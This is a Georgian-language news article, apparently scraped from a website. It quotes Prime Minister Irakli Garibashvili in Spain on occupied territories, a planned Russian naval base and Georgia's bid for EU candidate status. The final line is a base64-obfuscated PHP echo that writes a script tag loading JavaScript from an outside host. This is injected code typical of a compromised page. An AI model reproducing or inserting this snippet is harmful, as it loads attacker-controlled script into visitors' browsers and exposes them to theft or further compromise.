celsiusi
ავერსი საქკაბელი

ყველამ კარგად იცის, რომ ჩვენ ვიმყოფებით მეტად სპეციფიკურ სიტუაციაში, ვინაიდან ქვეყნის ტერიტორიების მნიშვნელოვანი ნაწილი არის ოკუპირებული და ამ ყველაფრის გათვალისწინებით, ქვეყანა ახერხებს განვითარებას, წინსვლას, რეფორმებს ისე, რომ ინარჩუნებს მშვიდობას და სტაბილურობას, – ამის შესახებ საქართველოს პრემიერ-მინისტრმა, ირაკლი ღარიბაშვილმა ესპანეთში ქართველ ჟურნალისტებს განუცხადა.

როგორც ირაკლი ღარიბაშვილმა აღნიშნა, მას ჰქონდა ორმხრივი შეხვედრები ევროპელ ლიდერებთან და მათ მიაწოდა ინფორმაცია საქართველოს მიღწევებზე.

„მნიშვნელოვან დისკუსიაში მივიღე მონაწილეობა. ეს იყო მრგვალი მაგიდის ფორმატი და დისკუსია შეეხებოდა გეოსტრატეგიულ საკითხებს და ამ კონტექსტში, რა თქმა უნდა, ჩვენ უსაფრთხოების საკითხები მიმოვიხილეთ. ბუნებრივია, საკითხი ეხებოდა უკრაინის ომსა და მის გავლენებს რეგიონზე, მათ შორის, ჩვენს რეგიონში მიმდინარე სიტუაციას და ბოლო დროს განვითარებულ მოვლენებს, რომელიც ეხება აზერბაიჯან-სომხეთს. მე ასევე მათ მივაწოდე ინფორმაცია დღეს დილით გავრცელებული ინფორმაციის თაობაზე. იცით, გახდა ცნობილი, რომ რუსეთი აპირებს უკვე მესამე სამხედრო ბაზის მშენებლობას, ამ შემთხვევაში საზღვაო ბაზის მშენებლობას ჩვენს ტერიტორიაზე, რა თქმა უნდა, ჩვენი ნებართვის გარეშე. ეს არის ოკუპაციის შედეგი, ოკუპაციის გაგრძელება, ჩვენ ასე აღვიქვამთ ამ უკანონო გადაწყვეტილებას. ბუნებრივია, მათ ვუთხარი, რომ ეს კიდევ უფრო აუარესებს ამ სიტუაციას, რომელიც თან ახლავს ოკუპაციას. ყველამ კარგად იცის და მე ამის თაობაზე მძაფრად აღვუწერე ჩვენი სიტუაცია, რომ ჩვენ ვიმყოფებით მეტად სპეციფიკურ სიტუაციაში, ვინაიდან ქვეყნის ტერიტორიების მნიშვნელოვანი ნაწილი არის ოკუპირებული და ამ ყველაფრის გათვალისწინებით, ქვეყანა ახერხებს განვითარებას, წინსვლას, რეფორმებს ისე, რომ ინარჩუნებს მშვიდობას და სტაბილურობას. ამას მართლაც მოხერხება სჭირდება და ჩვენ მართლაც გვაქვს სათქმელი ამ მიმართულებით.

ასევე, მინდა, გითხრათ, რომ მქონდა მნიშვნელოვანი ორმხრივი შეხვედრებიც ევროპელ ლიდერებთან. მე მათ ანალოგიურად მივაწოდე ინფორმაცია მიღწეულ პროგრესზე და მათგან, ყველა ევროპელი ლიდერისგან მივიღე დასტური იმის თაობაზე, რომ ისინი მხარს დაუჭერენ საქართველოსთვის კანდიდატის სტატუსის მინიჭებას. ასევე ვუთხარი, რომ თუ ქვეყანა სტატუსს არ მიიღებს, იქნება აბსოლუტურად გაუგებარი. ეს იქნება შეურაცხყოფა ჩვენი ქართველი ხალხის. ეს იქნება დაუმსახურებელი მორიგი მცდელობა, რომ ქვეყანა, არ ვიცი, დაჩაგრონ, უსამართლოდ მოექცნენ და მოეპყრან. ეს იქნება აბსოლუტურად მიუღებელი, და, რაც მთავარია, ბოლო მესიჯი, რაც მე მათ ვუთხარი, ეს იქნება პირდაპირი გზავნილი, თუნდაც იმავე რუსეთისთვის და სხვა ქვეყნებისთვის, ზოგადად რეგიონისთვის, ან იმავე იმ ქვეყნებისთვის, რომლებიც ცდილობენ, რომ დაახლოვდნენ ევროკავშირთან. აი, ამ საკითხებზე გვქონდა ჩვენ ევროკავშირთან საუბარი და ვფიქრობ, ძალიან მნიშვნელოვანი იყო ჩვენი მონაწილეობა ამ ფორუმში“, – განაცხადა ირაკლი ღარიბაშვილმა.

226
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");